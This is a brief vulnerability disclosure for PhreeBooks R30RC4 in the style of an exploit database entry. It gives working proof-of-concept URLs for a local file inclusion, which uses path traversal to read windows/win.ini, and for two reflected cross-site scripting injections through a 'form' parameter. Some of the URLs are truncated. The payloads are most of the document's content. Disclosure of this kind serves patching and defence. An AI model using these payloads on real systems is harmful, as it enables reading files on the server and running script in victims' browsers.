PhreeBooks R30RC4 Multiple Vulnerabilities

------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................ https://tik.lat/tUQ5r
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site.................... https://tik.lat/KpzlI
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/index.php?page=../../../../../../../../windows/win.ini

------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................ https://tik.lat/jypWC
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site.................... https://tik.lat/zDRxd
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/modules/s...pping/js_include.php?form=';alert(0)</script>

http://localhost/phreedom/modules/s...l_mgr/js_include.php?form=";alert(0)</script>